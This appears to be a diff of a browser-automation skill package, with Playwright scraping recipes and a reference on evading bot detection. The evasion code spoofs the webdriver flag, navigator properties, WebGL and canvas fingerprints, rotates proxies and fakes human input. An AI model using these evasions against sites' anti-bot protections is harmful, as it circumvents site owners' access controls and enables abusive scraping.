| `form_automation_builder.py` | Generate form-fill automation script from field spec | `--fields`, `--url`, `--output` | Python automation script |
| `anti_detection_checker.py` | Audit a Playwright script for detection vectors | `--file`, `--verbose` | Risk report with score |
All scripts are stdlib-only. Run `python3 <script> --help` for full usage.
## Anti-Patterns
### Hardcoded Waits
**Bad:** `await page.wait_for_timeout(5000)` before every action.
**Good:** Use `wait_for_selector`, `wait_for_url`, `expect_response`, or `wait_for_load_state`. Hardcoded waits are flaky and slow.
### No Error Recovery
**Bad:** Linear script that crashes on first failure.
**Good:** Wrap each page interaction in try/except. Take error-state screenshots. Implement retry with exponential backoff.
### Ignoring robots.txt
**Bad:** Scraping without checking robots.txt directives.
**Good:** Fetch and parse robots.txt before scraping. Respect `Crawl-delay`. Skip disallowed paths. Add your bot name to User-Agent if running at scale.
### Storing Credentials in Scripts
**Bad:** Hardcoding usernames and passwords in Python files.
**Good:** Use environment variables, `.env` files (gitignored), or a secrets manager. Pass credentials via CLI arguments.
### No Rate Limiting
**Bad:** Hammering a site with 100 requests/second.
**Good:** Add random delays between requests (1-3s for polite scraping). Monitor for 429 responses. Implement exponential backoff.
### Selector Fragility
**Bad:** Relying on auto-generated class names (`.css-1a2b3c`) or deep nesting (`div > div > div > span:nth-child(3)`).
**Good:** Use data attributes, semantic HTML, or text-based locators. Test selectors in browser DevTools first.
### Not Cleaning Up Browser Instances
**Bad:** Launching browsers without closing them, leading to resource leaks.
**Good:** Always use `try/finally` or async context managers to ensure `browser.close()` is called.
### Running Headed in Production
**Bad:** Using `headless=False` in production/CI.
**Good:** Develop with headed mode for debugging, deploy with `headless=True`. Use environment variable to toggle: `headless = os.environ.get("HEADLESS", "true") == "true"`.
## Cross-References
- **playwright-pro** — Browser testing skill. Use for E2E tests, test assertions, test fixtures. Browser Automation is for data extraction and workflow automation, not testing.
- **api-test-suite-builder** — When the website has a public API, hit the API directly instead of scraping the rendered page. Faster, more reliable, less detectable.
- **performance-profiler** — If your automation scripts are slow, profile the bottlenecks before adding concurrency.
- **env-secrets-manager** — For securely managing credentials used in authenticated automation workflows.

View File

@@ -0,0 +1,453 @@
# Anti-Detection Patterns for Browser Automation
This reference covers techniques to make Playwright automation less detectable by anti-bot services. These are defense-in-depth measures — no single technique is sufficient, but combining them significantly reduces detection risk.
## Detection Vectors
Anti-bot systems detect automation through multiple signals. Understanding what they check helps you counter effectively.
### Tier 1: Trivial Detection (Every Site Checks These)
1. **navigator.webdriver** — Set to `true` by all automation frameworks
2. **User-Agent string** — Default headless UA contains "HeadlessChrome"
3. **WebGL renderer** — Headless Chrome reports "SwiftShader" or "Google SwiftShader"
### Tier 2: Common Detection (Most Anti-Bot Services)
4. **Viewport/screen dimensions** — Unusual sizes flag automation
5. **Plugins array** — Empty in headless mode, populated in real browsers
6. **Languages** — Missing or mismatched locale
7. **Request timing** — Machine-speed interactions
8. **Mouse movement** — No mouse events between clicks
### Tier 3: Advanced Detection (Cloudflare, DataDome, PerimeterX)
9. **Canvas fingerprint** — Headless renders differently
10. **WebGL fingerprint** — GPU-specific rendering variations
11. **Audio fingerprint** — AudioContext processing differences
12. **Font enumeration** — Different available fonts in headless
13. **Behavioral analysis** — Scroll patterns, click patterns, reading time
## Stealth Techniques
### 1. WebDriver Flag Removal
The most critical fix. Every anti-bot check starts here.
```python
await page.add_init_script("""
// Remove webdriver flag
Object.defineProperty(navigator, 'webdriver', {
get: () => undefined,
});
// Remove Playwright-specific properties
delete window.__playwright;
delete window.__pw_manual;
""")
```
### 2. User Agent Configuration
Match the user agent to the browser you are launching. A Chrome UA with Firefox-specific headers is a red flag.
```python
# Chrome 120 on Windows 10 (most common configuration globally)
CHROME_WIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Chrome 120 on macOS
CHROME_MAC = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Chrome 120 on Linux
CHROME_LINUX = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Firefox 121 on Windows
FIREFOX_WIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
```
**Rules:**
- Update UAs every 2-3 months as browser versions increment
- Match UA platform to `navigator.platform` override
- If using Chromium, use Chrome UAs. If Firefox, use Firefox UAs.
- Never use obviously fake or ancient UAs
### 3. Viewport and Screen Properties
Common real-world screen resolutions (from analytics data):
| Resolution | Market Share | Use For |
|-----------|-------------|---------|
| 1920x1080 | ~23% | Default choice |
| 1366x768 | ~14% | Laptop simulation |
| 1536x864 | ~9% | Scaled laptop |
| 1440x900 | ~7% | MacBook |
| 2560x1440 | ~5% | High-end desktop |
```python
import random
VIEWPORTS = [
{"width": 1920, "height": 1080},
{"width": 1366, "height": 768},
{"width": 1536, "height": 864},
{"width": 1440, "height": 900},
]
viewport = random.choice(VIEWPORTS)
context = await browser.new_context(
viewport=viewport,
screen=viewport, # screen should match viewport
)
```
### 4. Navigator Properties Hardening
```python
STEALTH_INIT = """
// Plugins (headless Chrome has 0 plugins, real Chrome has 3-5)
Object.defineProperty(navigator, 'plugins', {
get: () => {
const plugins = [
{ name: 'Chrome PDF Plugin', filename: 'internal-pdf-viewer' },
{ name: 'Chrome PDF Viewer', filename: 'mhjfbmdgcfjbbpaeojofohoefgiehjai' },
{ name: 'Native Client', filename: 'internal-nacl-plugin' },
];
plugins.length = 3;
return plugins;
},
});
// Languages
Object.defineProperty(navigator, 'languages', {
get: () => ['en-US', 'en'],
});
// Platform (match to user agent)
Object.defineProperty(navigator, 'platform', {
get: () => 'Win32', // or 'MacIntel' for macOS UA
});
// Hardware concurrency (real browsers report CPU cores)
Object.defineProperty(navigator, 'hardwareConcurrency', {
get: () => 8,
});
// Device memory (Chrome-specific)
Object.defineProperty(navigator, 'deviceMemory', {
get: () => 8,
});
// Connection info
Object.defineProperty(navigator, 'connection', {
get: () => ({
effectiveType: '4g',
rtt: 50,
downlink: 10,
saveData: false,
}),
});
"""
await context.add_init_script(STEALTH_INIT)
```
### 5. WebGL Fingerprint Evasion
Headless Chrome uses SwiftShader for WebGL, which anti-bot services detect.
```python
# Option A: Launch with a real GPU (headed mode on a machine with GPU)
browser = await p.chromium.launch(headless=False)
# Option B: Override WebGL renderer info
await page.add_init_script("""
const getParameter = WebGLRenderingContext.prototype.getParameter;
WebGLRenderingContext.prototype.getParameter = function(parameter) {
if (parameter === 37445) {
return 'Intel Inc.'; // UNMASKED_VENDOR_WEBGL
}
if (parameter === 37446) {
return 'Intel(R) Iris(TM) Plus Graphics 640'; // UNMASKED_RENDERER_WEBGL
}
return getParameter.call(this, parameter);
};
""")
```
### 6. Canvas Fingerprint Noise
Anti-bot services render text/shapes to a canvas and hash the output. Headless Chrome produces a different hash.
```python
await page.add_init_script("""
const originalToDataURL = HTMLCanvasElement.prototype.toDataURL;
HTMLCanvasElement.prototype.toDataURL = function(type) {
if (type === 'image/png' || type === undefined) {
// Add minimal noise to the canvas to change fingerprint
const ctx = this.getContext('2d');
if (ctx) {
const imageData = ctx.getImageData(0, 0, this.width, this.height);
for (let i = 0; i < imageData.data.length; i += 4) {
// Shift one channel by +/- 1 (imperceptible)
imageData.data[i] = imageData.data[i] ^ 1;
}
ctx.putImageData(imageData, 0, 0);
}
}
return originalToDataURL.apply(this, arguments);
};
""")
```
## Request Throttling Patterns
### Human-Like Delays
Real users do not click at machine speed. Add realistic delays between actions.
```python
import random
import asyncio
async def human_delay(action_type="browse"):
    """Sleep for a realistic, randomized interval appropriate to the action."""
    # (min_seconds, max_seconds) per action category; unknown action types
    # fall back to a middle-ground range.
    ranges = {
        "browse": (1.0, 3.0),
        "read": (2.0, 8.0),
        "fill": (0.3, 0.8),
        "click": (0.1, 0.5),
        "scroll": (0.5, 1.5),
    }
    low, high = ranges.get(action_type, (0.5, 2.0))
    await asyncio.sleep(random.uniform(low, high))
```
### Request Rate Limiting
```python
import time
class RateLimiter:
    """Enforce a minimum delay between successive requests."""

    def __init__(self, min_interval_seconds=1.0):
        self.min_interval = min_interval_seconds
        self.last_request_time = 0  # epoch seconds of the previous request

    async def wait(self):
        """Sleep just long enough to honor the minimum interval, then stamp the time."""
        since_last = time.time() - self.last_request_time
        remaining = self.min_interval - since_last
        if remaining > 0:
            await asyncio.sleep(remaining)
        self.last_request_time = time.time()
# Usage
limiter = RateLimiter(min_interval_seconds=2.0)
for url in urls:
await limiter.wait()
await page.goto(url)
```
### Exponential Backoff on Errors
```python
async def with_backoff(coro_factory, max_retries=5, base_delay=1.0):
    """Retry an async operation with exponential backoff plus random jitter.

    Waits base_delay * 2**attempt (+ up to 1s jitter) between attempts and
    re-raises the final failure.
    """
    final = max_retries - 1
    for attempt in range(max_retries):
        try:
            return await coro_factory()
        except Exception as exc:
            if attempt == final:
                raise
            delay = base_delay * (2 ** attempt) + random.uniform(0, 1)
            print(f"Attempt {attempt + 1} failed: {exc}. Retrying in {delay:.1f}s...")
            await asyncio.sleep(delay)
```
## Proxy Rotation Strategies
### Single Proxy
```python
browser = await p.chromium.launch(
proxy={"server": "http://proxy.example.com:8080"}
)
```
### Authenticated Proxy
```python
context = await browser.new_context(
proxy={
"server": "http://proxy.example.com:8080",
"username": "user",
"password": "pass",
}
)
```
### Rotating Proxy Pool
```python
PROXIES = [
"http://proxy1.example.com:8080",
"http://proxy2.example.com:8080",
"http://proxy3.example.com:8080",
]
async def create_context_with_proxy(browser):
    """Create a browser context routed through a randomly chosen proxy
    from the module-level PROXIES pool."""
    proxy = random.choice(PROXIES)
    return await browser.new_context(
        proxy={"server": proxy}
    )
```
### Per-Request Proxy (via Context Rotation)
Playwright does not support per-request proxy switching. Achieve it by creating a new context for each request or batch:
```python
async def scrape_url(browser, url, proxy):
    """Scrape one URL through the given proxy using a throwaway context.

    A fresh context per request is how per-request proxy rotation is
    achieved. `extract_data` is assumed to be defined by the caller's script.
    """
    context = await browser.new_context(proxy={"server": proxy})
    page = await context.new_page()
    try:
        await page.goto(url)
        data = await extract_data(page)
        return data
    finally:
        # Always release the context (and its proxy connection), even on error.
        await context.close()
```
### SOCKS5 Proxy
```python
browser = await p.chromium.launch(
proxy={"server": "socks5://proxy.example.com:1080"}
)
```
## Headless Detection Avoidance
### Running Chrome Channel Instead of Chromium
The bundled Chromium binary has different properties than a real Chrome install. Using the Chrome channel makes the browser indistinguishable from a normal install.
```python
# Use installed Chrome instead of bundled Chromium
browser = await p.chromium.launch(channel="chrome", headless=True)
```
**Requirements:** Chrome must be installed on the system.
### New Headless Mode (Chrome 112+)
Chrome's "new headless" mode is harder to detect than the old one:
```python
browser = await p.chromium.launch(
args=["--headless=new"],
)
```
### Avoiding Common Flags
Do NOT pass these flags — they are headless-detection signals:
- `--disable-gpu` (old headless workaround, not needed)
- `--no-sandbox` (security risk, detectable)
- `--disable-setuid-sandbox` (same as above)
## Behavioral Evasion
### Mouse Movement Simulation
Anti-bot services track mouse events. A click without preceding mouse movement is suspicious.
```python
async def human_click(page, selector):
    """Click an element after moving the mouse toward it in small steps.

    Fix: the original dereferenced the result of query_selector without a
    None check, raising AttributeError for a missing element; a missing
    selector now raises an explicit ValueError instead.
    """
    element = await page.query_selector(selector)
    if element is None:
        raise ValueError(f"human_click: no element matches selector {selector!r}")
    box = await element.bounding_box()
    if box:
        # Move to element with slight offset
        x = box["x"] + box["width"] / 2 + random.uniform(-5, 5)
        y = box["y"] + box["height"] / 2 + random.uniform(-5, 5)
        await page.mouse.move(x, y, steps=random.randint(5, 15))
        await asyncio.sleep(random.uniform(0.05, 0.2))
        await page.mouse.click(x, y)
```
### Typing Speed Variation
```python
async def human_type(page, selector, text):
    """Type text character-by-character with human-like variable pacing."""
    await page.click(selector)
    fast_keys = "aeiou tnrs"  # common keys get shorter inter-key delays
    for ch in text:
        await page.keyboard.type(ch)
        low, high = (0.03, 0.08) if ch in fast_keys else (0.08, 0.20)
        await asyncio.sleep(random.uniform(low, high))
```
### Scroll Behavior
Real users scroll gradually, not in instant jumps.
```python
async def human_scroll(page, distance=None):
    """Scroll the page downward in small, randomly sized wheel steps."""
    if distance is None:
        distance = random.randint(300, 800)
    travelled = 0
    while travelled < distance:
        delta = random.randint(50, 150)
        await page.mouse.wheel(0, delta)
        travelled += delta
        await asyncio.sleep(random.uniform(0.05, 0.15))
```
## Detection Testing
### Self-Check Script
Navigate to these URLs to test your stealth configuration:
- `https://bot.sannysoft.com/` — Comprehensive bot detection test
- `https://abrahamjuliot.github.io/creepjs/` — Advanced fingerprint analysis
- `https://browserleaks.com/webgl` — WebGL fingerprint details
- `https://browserleaks.com/canvas` — Canvas fingerprint details
### Quick Test Pattern
```python
async def test_stealth(page):
    """Navigate to detection test page and report results."""
    await page.goto("https://bot.sannysoft.com/")
    # Give the page's JS checks time to finish rendering their verdicts.
    await page.wait_for_timeout(3000)
    # Check for failed tests: each failed row carries a td.failed cell;
    # collect the row's first-column label for reporting.
    failed = await page.eval_on_selector_all(
        "td.failed",
        "els => els.map(e => e.parentElement.querySelector('td').textContent)"
    )
    if failed:
        print(f"FAILED checks: {failed}")
    else:
        print("All checks passed.")
    await page.screenshot(path="stealth_test.png", full_page=True)
```
## Recommended Stealth Stack
For most automation tasks, apply these in order of priority:
1. **WebDriver flag removal** — Critical, takes 2 lines
2. **Custom user agent** — Critical, takes 1 line
3. **Viewport configuration** — High priority, takes 1 line
4. **Request delays** — High priority, add random.uniform() calls
5. **Navigator properties** — Medium priority, init script block
6. **Chrome channel** — Medium priority, one launch option
7. **WebGL override** — Low priority unless hitting advanced anti-bot
8. **Canvas noise** — Low priority unless hitting advanced anti-bot
9. **Proxy rotation** — Only for high-volume or repeated scraping
10. **Behavioral simulation** — Only for sites with behavioral analysis

View File

@@ -0,0 +1,580 @@
# Data Extraction Recipes
Practical patterns for extracting structured data from web pages using Playwright. Each recipe is a self-contained pattern you can adapt to your target site.
## CSS Selector Patterns for Common Structures
### E-Commerce Product Listings
```python
PRODUCT_SELECTORS = {
"container": "div.product-card, article.product, li.product-item",
"fields": {
"title": "h2.product-title, h3.product-name, [data-testid='product-title']",
"price": "span.price, .product-price, [data-testid='price']",
"original_price": "span.original-price, .was-price, del",
"rating": "span.rating, .star-rating, [data-rating]",
"review_count": "span.review-count, .num-reviews",
"image_url": "img.product-image::attr(src), img::attr(data-src)",
"product_url": "a.product-link::attr(href), h2 a::attr(href)",
"availability": "span.stock-status, .availability",
}
}
```
### News/Blog Article Listings
```python
ARTICLE_SELECTORS = {
"container": "article, div.post, div.article-card",
"fields": {
"headline": "h2 a, h3 a, .article-title",
"summary": "p.excerpt, .article-summary, .post-excerpt",
"author": "span.author, .byline, [rel='author']",
"date": "time, span.date, .published-date",
"category": "span.category, a.tag, .article-category",
"url": "h2 a::attr(href), .article-title a::attr(href)",
"image_url": "img.thumbnail::attr(src), .article-image img::attr(src)",
}
}
```
### Job Listings
```python
JOB_SELECTORS = {
"container": "div.job-card, li.job-listing, article.job",
"fields": {
"title": "h2.job-title, a.job-link, [data-testid='job-title']",
"company": "span.company-name, .employer, [data-testid='company']",
"location": "span.location, .job-location, [data-testid='location']",
"salary": "span.salary, .compensation, [data-testid='salary']",
"job_type": "span.job-type, .employment-type",
"posted_date": "time, span.posted, .date-posted",
"url": "a.job-link::attr(href), h2 a::attr(href)",
}
}
```
### Search Engine Results
```python
SERP_SELECTORS = {
"container": "div.g, .search-result, li.result",
"fields": {
"title": "h3, .result-title",
"url": "a::attr(href), cite",
"snippet": "div.VwiC3b, .result-snippet, .search-description",
"displayed_url": "cite, .result-url",
}
}
```
## Table Extraction Recipes
### Simple HTML Table to JSON
The most common extraction pattern. Works for any standard `<table>` with `<thead>` and `<tbody>`.
```python
async def extract_table(page, table_selector="table"):
    """Extract an HTML table into a list of dictionaries.

    Headers come from <thead>; if absent, the first row is used as headers.
    Returns [] when no table matches table_selector.

    Fix: the JS was wrapped in an f-string with no interpolation, forcing
    every brace to be doubled. The selector is already passed to evaluate()
    as an argument, so a plain string works and reads as normal JavaScript.
    """
    data = await page.evaluate(
        """
        (selector) => {
            const table = document.querySelector(selector);
            if (!table) return null;
            // Get headers
            const headers = Array.from(table.querySelectorAll('thead th, thead td'))
                .map(th => th.textContent.trim());
            // If no thead, use first row as headers
            if (headers.length === 0) {
                const firstRow = table.querySelector('tr');
                if (firstRow) {
                    headers.push(...Array.from(firstRow.querySelectorAll('th, td'))
                        .map(cell => cell.textContent.trim()));
                }
            }
            // Get data rows
            const rows = Array.from(table.querySelectorAll('tbody tr'));
            return rows.map(row => {
                const cells = Array.from(row.querySelectorAll('td'));
                const obj = {};
                cells.forEach((cell, i) => {
                    if (i < headers.length) {
                        obj[headers[i]] = cell.textContent.trim();
                    }
                });
                return obj;
            });
        }
        """,
        table_selector,
    )
    return data or []
```
### Table with Links and Attributes
When table cells contain links or data attributes, not just text:
```python
async def extract_rich_table(page, table_selector="table"):
    """Extract a table including cell links (as `<key>_url`) and data-*
    attributes (as `<key>_data-*`).

    Fix: the JS was wrapped in an f-string with no interpolation, forcing
    brace-doubling. The selector is passed as an evaluate() argument, so a
    plain string suffices.
    """
    return await page.evaluate(
        """
        (selector) => {
            const table = document.querySelector(selector);
            if (!table) return [];
            const headers = Array.from(table.querySelectorAll('thead th'))
                .map(th => th.textContent.trim());
            return Array.from(table.querySelectorAll('tbody tr')).map(row => {
                const obj = {};
                Array.from(row.querySelectorAll('td')).forEach((cell, i) => {
                    const key = headers[i] || `col_${i}`;
                    obj[key] = cell.textContent.trim();
                    // Extract link if present
                    const link = cell.querySelector('a');
                    if (link) {
                        obj[key + '_url'] = link.href;
                    }
                    // Extract data attributes
                    for (const attr of cell.attributes) {
                        if (attr.name.startsWith('data-')) {
                            obj[key + '_' + attr.name] = attr.value;
                        }
                    }
                });
                return obj;
            });
        }
        """,
        table_selector,
    )
```
### Multi-Page Table (Paginated)
```python
async def extract_paginated_table(page, table_selector, next_selector, max_pages=50):
    """Accumulate rows from a table that spans multiple pages.

    Headers are captured from the first page that exposes a <thead>; each row
    is zipped against them into a dict. Pagination stops when the next button
    is missing or disabled, or after max_pages pages.
    """
    script = """
        (selector) => {
            const table = document.querySelector(selector);
            if (!table) return { headers: [], rows: [] };
            return {
                headers: Array.from(table.querySelectorAll('thead th'))
                    .map(th => th.textContent.trim()),
                rows: Array.from(table.querySelectorAll('tbody tr')).map(row =>
                    Array.from(row.querySelectorAll('td')).map(td => td.textContent.trim())
                ),
            };
        }
    """
    collected = []
    headers = None
    for _ in range(max_pages):
        snapshot = await page.evaluate(script, table_selector)
        if headers is None and snapshot["headers"]:
            headers = snapshot["headers"]
        collected.extend(dict(zip(headers or [], row)) for row in snapshot["rows"])
        # Advance to the next page, if there is one.
        next_btn = page.locator(next_selector)
        if await next_btn.count() == 0 or await next_btn.is_disabled():
            break
        await next_btn.click()
        await page.wait_for_load_state("networkidle")
        await page.wait_for_timeout(random.randint(800, 2000))
    return collected
```
## Product Listing Extraction
### Generic Listing Extractor
Works for any repeating card/list pattern:
```python
async def extract_listings(page, container_sel, field_map):
    """Extract one dict per repeating element matched by container_sel.

    field_map maps output field names to CSS selectors. A selector may end in
    ::attr(name) to read an attribute, or ::html to read innerHTML; otherwise
    the element's trimmed text content is used. Missing or failing lookups
    record None for that field.
    """
    results = []
    for card in await page.query_selector_all(container_sel):
        record = {}
        for name, spec in field_map.items():
            try:
                if "::attr(" in spec:
                    css, attr = spec.split("::attr(")
                    attr = attr.rstrip(")")
                    node = await card.query_selector(css)
                    record[name] = await node.get_attribute(attr) if node else None
                elif spec.endswith("::html"):
                    node = await card.query_selector(spec.replace("::html", ""))
                    record[name] = await node.inner_html() if node else None
                else:
                    node = await card.query_selector(spec)
                    record[name] = (await node.text_content()).strip() if node else None
            except Exception:
                # Bad selector or detached node: record None rather than abort.
                record[name] = None
        results.append(record)
    return results
```
### With Price Parsing
```python
import re
def parse_price(text):
    """Extract a numeric price from free-form text.

    Handles US format ('$1,234.56'), European format ('1.234,56 EUR'),
    and dot- or comma-grouped thousands ('1.234.567', '1,23,456').
    Returns a float, or None when no number can be recovered.
    """
    if not text:
        return None
    # Strip currency symbols, spaces, and everything else non-numeric.
    cleaned = re.sub(r'[^\d.,]', '', text.strip())
    if not cleaned:
        return None
    if ',' in cleaned and '.' in cleaned:
        # Both separators present: the right-most one is the decimal point.
        if cleaned.rindex(',') > cleaned.rindex('.'):
            cleaned = cleaned.replace('.', '').replace(',', '.')  # European style
        else:
            cleaned = cleaned.replace(',', '')  # US style
    elif ',' in cleaned:
        parts = cleaned.split(',')
        if len(parts) > 2:
            # Multiple commas: grouping separators (e.g. 1,234,567 or 1,23,456).
            cleaned = cleaned.replace(',', '')
        elif len(parts[-1]) <= 2:
            cleaned = cleaned.replace(',', '.')  # decimal comma (1,23)
        else:
            cleaned = cleaned.replace(',', '')  # thousands (1,234)
    elif cleaned.count('.') > 1:
        # Multiple dots with no comma: dot-grouped thousands (1.234.567).
        # The old code fell through to float() and returned None here.
        cleaned = cleaned.replace('.', '')
    try:
        return float(cleaned)
    except ValueError:
        return None
async def extract_products_with_prices(page, container_sel, field_map, price_field="price"):
    """Extract listings, keeping the raw price string and adding a parsed float.

    The original string is preserved under '<price_field>_raw'; the price_field
    itself is replaced with the parse_price() float (or None).
    """
    records = await extract_listings(page, container_sel, field_map)
    for record in records:
        raw = record.get(price_field)
        if raw:
            record[f"{price_field}_raw"] = raw
            record[price_field] = parse_price(raw)
    return records
```
## Pagination Handling
### Next-Button Pagination
The most common pattern. Click "Next" until the button disappears or is disabled.
```python
async def paginate_via_next_button(page, next_selector, content_selector, max_pages=100):
    """Async generator: yield the page once per result page while clicking "Next".

    next_selector locates the "Next" button/link; content_selector is awaited
    after each click to confirm the new page rendered. Stops when the button
    is gone, disabled, or errors on the disabled check, or after max_pages.
    """
    for _ in range(max_pages):
        yield page  # caller scrapes the current page here
        next_btn = page.locator(next_selector)
        if await next_btn.count() == 0:
            break
        try:
            disabled = await next_btn.is_disabled()
        except Exception:
            disabled = True  # treat an un-inspectable button as the end
        if disabled:
            break
        await next_btn.click()
        await page.wait_for_selector(content_selector, state="attached")
        await page.wait_for_timeout(random.randint(500, 1500))
```
### URL-Based Pagination
When pages follow a predictable URL pattern:
```python
async def paginate_via_url(page, url_template, start=1, max_pages=100):
    """Async generator over predictable page URLs, yielding (page, page_number).

    url_template must contain a {page} placeholder, e.g.
    "https://example.com/search?page={page}". Stops on an HTTP 404 or after
    max_pages pages.
    """
    for number in range(start, start + max_pages):
        response = await page.goto(url_template.format(page=number), wait_until="networkidle")
        if response and response.status == 404:
            break
        yield page, number
        await page.wait_for_timeout(random.randint(800, 2500))
```
### Infinite Scroll
For sites that load content as you scroll:
```python
async def paginate_via_scroll(page, item_selector, max_scrolls=100, no_change_limit=3):
    """Scroll to the bottom repeatedly to trigger lazy-loaded content.

    item_selector counts loaded items to measure progress. Scrolling stops
    after no_change_limit consecutive scrolls with no new items, or after
    max_scrolls. Also clicks any "Load More"/"Show More" button that appears.
    Returns the final item count (0 when max_scrolls <= 0).
    """
    previous_count = 0
    # Defined before the loop so max_scrolls <= 0 cannot raise NameError
    # at the return statement (the original referenced it unbound).
    current_count = 0
    no_change_streak = 0
    for _ in range(max_scrolls):
        current_count = await page.locator(item_selector).count()
        if current_count == previous_count:
            no_change_streak += 1
            if no_change_streak >= no_change_limit:
                break
        else:
            no_change_streak = 0
            previous_count = current_count
        # Scroll to the bottom to trigger the next content batch.
        await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
        await page.wait_for_timeout(random.randint(1000, 2500))
        # Some sites gate further content behind a "Load More" button.
        load_more = page.locator("button:has-text('Load More'), button:has-text('Show More')")
        if await load_more.count() > 0 and await load_more.is_visible():
            await load_more.click()
            await page.wait_for_timeout(random.randint(1000, 2000))
    return current_count
```
### Load-More Button
Simpler variant of infinite scroll where content loads via a button:
```python
async def paginate_via_load_more(page, button_selector, item_selector, max_clicks=50):
    """Click a 'Load More' button until it disappears or stops adding items.

    Returns the final count of elements matching item_selector.
    """
    for _ in range(max_clicks):
        button = page.locator(button_selector)
        if await button.count() == 0 or not await button.is_visible():
            break
        before = await button.page.locator(item_selector).count() if False else await page.locator(item_selector).count()
        await button.click()
        try:
            # Block until the item count grows past the pre-click total.
            await page.wait_for_function(
                f"document.querySelectorAll('{item_selector}').length > {before}",
                timeout=10000,
            )
        except Exception:
            break  # nothing new arrived; assume we reached the end
        await page.wait_for_timeout(random.randint(500, 1500))
    return await page.locator(item_selector).count()
```
## Nested Data Extraction
### Comments with Replies (Threaded)
```python
async def extract_threaded_comments(page, parent_selector=".comments"):
    """Extract comments with arbitrarily nested replies as a tree of dicts.

    Each node carries author, text, date (datetime attribute preferred over
    display text), and a 'replies' list built by recursing into the
    .replies/.children container.
    """
    script = """
        (parentSelector) => {
            function extractThread(container) {
                const comments = [];
                for (const comment of container.querySelectorAll(':scope > .comment')) {
                    const authorEl = comment.querySelector('.author, .username');
                    const textEl = comment.querySelector('.comment-text, .comment-body');
                    const dateEl = comment.querySelector('time, .date');
                    const repliesEl = comment.querySelector('.replies, .children');
                    comments.push({
                        author: authorEl ? authorEl.textContent.trim() : null,
                        text: textEl ? textEl.textContent.trim() : null,
                        date: dateEl ? (dateEl.getAttribute('datetime') || dateEl.textContent.trim()) : null,
                        replies: repliesEl ? extractThread(repliesEl) : [],
                    });
                }
                return comments;
            }
            const root = document.querySelector(parentSelector);
            return root ? extractThread(root) : [];
        }
    """
    return await page.evaluate(script, parent_selector)
```
### Nested Categories (Sidebar/Menu)
```python
async def extract_category_tree(page, root_selector="nav.categories"):
    """Extract a nested category menu as a tree of {name, url, children} dicts.

    Starts from the first <ul> under root_selector (or the root itself) and
    recurses through direct <li>/.category children and their sub-menus.
    """
    script = """
        (rootSelector) => {
            function extractLevel(container) {
                const items = [];
                for (const item of container.querySelectorAll(':scope > li, :scope > div.category')) {
                    const link = item.querySelector(':scope > a');
                    const subMenu = item.querySelector(':scope > ul, :scope > div.sub-categories');
                    items.push({
                        name: link ? link.textContent.trim() : item.textContent.trim().split('\\n')[0],
                        url: link ? link.href : null,
                        children: subMenu ? extractLevel(subMenu) : [],
                    });
                }
                return items;
            }
            const root = document.querySelector(rootSelector);
            return root ? extractLevel(root.querySelector('ul') || root) : [];
        }
    """
    return await page.evaluate(script, root_selector)
```
### Accordion/Expandable Content
Some content is hidden behind accordion/expand toggles. Click to reveal, then extract.
```python
async def extract_accordion(page, toggle_selector, content_selector):
    """Expand every accordion/FAQ toggle and collect {title, content} pairs.

    Clicks each toggle, then reads the content panel found by walking up to
    the nearest .accordion-item/.faq-item ancestor and querying
    content_selector inside it. content is None when no panel is found.
    """
    items = []
    for toggle in await page.query_selector_all(toggle_selector):
        title = (await toggle.text_content()).strip()
        await toggle.click()
        await page.wait_for_timeout(300)  # let the expand animation settle
        handle = await toggle.evaluate_handle(
            f"el => el.closest('.accordion-item, .faq-item')?.querySelector('{content_selector}')"
        )
        # evaluate_handle always returns a handle, even for null/undefined, so
        # truthiness of the handle itself can't detect a missing panel.
        # as_element() is None for non-element results — check that instead.
        element = handle.as_element()
        body = None
        if element:
            body = await element.text_content()
            if body:
                body = body.strip()
        items.append({"title": title, "content": body})
    return items
```
## Data Cleaning Utilities
### Post-Extraction Cleaning
```python
import re
def clean_text(text):
    """Collapse whitespace and strip zero-width characters.

    Returns the cleaned string, or None for empty/None input or when
    nothing remains after cleaning.
    """
    if not text:
        return None
    # Drop zero-width space/joiner/non-joiner and BOM characters.
    without_zw = re.sub(r'[\u200b\u200c\u200d\ufeff]', '', text)
    # Collapse all runs of whitespace (incl. newlines/tabs) to single spaces.
    normalized = re.sub(r'\s+', ' ', without_zw).strip()
    return normalized or None
def clean_url(url, base_url=None):
    """Normalize a scraped href.

    Protocol-relative URLs ('//host/...') get an https scheme; root-relative
    paths ('/...') are joined onto base_url when one is given. Anything else
    is returned trimmed; empty/None input yields None.
    """
    if not url:
        return None
    trimmed = url.strip()
    if trimmed.startswith("//"):
        return f"https:{trimmed}"
    if trimmed.startswith("/") and base_url:
        return base_url.rstrip("/") + trimmed
    return trimmed
def deduplicate(items, key_field):
    """Keep only the first item seen for each value of key_field.

    Items whose key is missing or falsy are dropped entirely (matching the
    original behavior: they never enter the result).
    """
    seen_keys = set()
    unique_items = []
    for entry in items:
        value = entry.get(key_field)
        if value and value not in seen_keys:
            seen_keys.add(value)
            unique_items.append(entry)
    return unique_items
```
### Output Formats
```python
import json
import csv
import io
def to_jsonl(items, file_path):
    """Write items as JSON Lines (one JSON object per line), UTF-8 encoded.

    encoding is pinned because ensure_ascii=False emits raw non-ASCII text,
    which would raise UnicodeEncodeError on platforms whose default file
    encoding is not UTF-8 (e.g. Windows cp1252).
    """
    with open(file_path, "w", encoding="utf-8") as f:
        for item in items:
            f.write(json.dumps(item, ensure_ascii=False) + "\n")
def to_csv(items, file_path):
    """Write items (a list of dicts) as UTF-8 CSV.

    Columns are the union of all keys in first-seen order, so rows with extra
    or missing fields serialize cleanly instead of DictWriter raising
    ValueError (the original used only the first item's keys). Missing values
    are written as empty cells. No-op for an empty list.
    """
    if not items:
        return
    # Union of keys across all rows, preserving first-seen order.
    headers = []
    for item in items:
        for key in item:
            if key not in headers:
                headers.append(key)
    # encoding pinned so non-ASCII values don't depend on the platform default.
    with open(file_path, "w", newline="", encoding="utf-8") as f:
        writer = csv.DictWriter(f, fieldnames=headers, restval="")
        writer.writeheader()
        writer.writerows(items)
def to_json(items, file_path, indent=2):
